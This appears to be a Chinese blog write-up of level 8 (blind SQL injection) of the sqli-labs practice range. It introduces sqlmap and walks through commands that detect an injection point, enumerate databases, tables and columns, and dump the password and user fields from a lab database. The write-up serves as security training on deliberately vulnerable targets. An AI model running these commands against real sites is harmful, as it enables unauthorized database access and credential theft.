web——sqliabs靶场——第八关——sqlmap的使用

时间:2024-11-22 07:05:30

第八关还是用到了盲注,我们来使用kali里的sqlmap工具来搞一下。

1.sqlmap简介

sqlmap 是一款开源的自动化 SQL 注入和数据库接管工具,旨在帮助安全研究人员和渗透测试人员检测和利用 SQL 注入漏洞。它支持多种数据库管理系统(如 MySQL、PostgreSQL、Oracle、SQL Server 等),能够自动化检测目标网站或应用的 SQL 注入漏洞,提取数据库信息、列出表格和字段、导出数据,甚至执行系统级命令。sqlmap 还具备绕过防护机制、处理认证和会话管理、盲注攻击等高级功能,是进行数据库安全评估的强大工具。

2.sqlmap的简单使用

2:工具6连注入(附属一张别人的总结)
1.   sqlmap -u  "http://www.xx.com?id=x"    【查询是否存在注入点

2.    sqlmap -u  "http://www.xx.com?id=x" --dbs         【检测站点包含哪些数据库

3.     sqlmap -u  "http://www.xx.com?id=x" --current-db    【获取当前的数据库名

4.     sqlmap -u  "http://www.xx.com?id=x" --tables -D "db_name"  【获取指定数据库中的表名 -D后接指定的数据库名称

5.   sqlmap -u  "http://www.xx.com?id=x" --columns  -T "table_name" -D "db_name"  【获取数据库表中的字段

6.    sqlmap -u  "http://www.xx.com?id=x" --dump -C "columns_name" -T "table_name" -D "db_name"  【获取字段的数据内容

3.现在做题理解一下

1.打开kali

        这一步很重要,吼吼吼吼吼吼吼吼吼吼吼吼吼吼吼

2.爆数据库

sqlmap -u http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-8/?id=1 –dbs

获得数据库为security

3.爆表名

sqlmap -u "http://9f462409-59a4-4180-9019-1b157684a2a2.node5.buuoj.cn/Less-8/?id=1" -D security --tables

 

4.爆列名

sqlmap -u "http://9f462409-59a4-4180-9019-1b157684a2a2.node5.buuoj.cn/Less-8/?id=1" -T users -D security --columns 

 

5.爆具体字段

sqlmap -u "http://9f462409-59a4-4180-9019-1b157684a2a2.node5.buuoj.cn/Less-8/?id=1" -C password -T users -D security --dump 
sqlmap -u "http://9f462409-59a4-4180-9019-1b157684a2a2.node5.buuoj.cn/Less-8/?id=1" -C  users -T users -D security --dump 

结束